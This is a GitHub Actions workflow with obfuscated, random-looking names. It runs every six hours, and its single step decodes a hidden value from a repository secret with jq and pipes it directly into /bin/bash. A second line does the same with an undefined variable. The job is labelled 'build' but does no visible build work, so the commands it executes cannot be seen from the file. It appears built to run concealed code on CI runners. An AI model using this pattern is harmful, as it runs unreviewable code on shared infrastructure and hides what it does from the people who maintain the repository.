name: heavyheadach

on:
  workflow_dispatch:
  schedule:
    - cron: '15 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: heavyheadach
        env:
          xpumo54886: ${{ secrets.xpumo54886 }}
        run: |
          echo $xpumo54886 | jq -r .cce77 | /bin/bash
          echo $cxnjm896 | jq -r .rhzo5 | /bin/bash

